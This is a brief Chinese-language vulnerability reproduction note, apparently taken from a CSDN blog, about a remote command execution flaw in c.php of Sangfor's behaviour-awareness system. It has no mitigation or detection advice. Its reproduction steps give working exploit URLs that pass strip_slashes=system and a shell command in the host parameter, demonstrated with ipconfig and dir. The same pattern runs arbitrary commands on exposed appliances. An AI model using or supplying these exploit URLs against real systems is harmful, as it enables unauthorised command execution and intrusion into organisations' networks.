深信服行为感知命令执行漏洞
1.1.漏洞描述
深信服 行为感知系统c.php远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行。
1.2.漏洞影响
深信服行为感知系统
1.3.漏洞复现
其实整个过程和深信服EDR命令执行漏洞差不多。
1.3.1.登录页面
1.3.2.构建漏洞URL
其实整个URL和EDR差不多。
URL:https://IP地址/tool/log/c.php?strip_slashes=system&host=ipconfig
1.3.2.1.查询IP地址
URL:https://IP地址/tool/log/c.php?strip_slashes=system&host=ipconfig
1.3.2.2.查询当前目录下文件
URL:https://IP地址/tool/log/c.php?strip_slashes=system&host=dir
来源地址:https://blog.csdn.net/weixin_44268918/article/details/128724919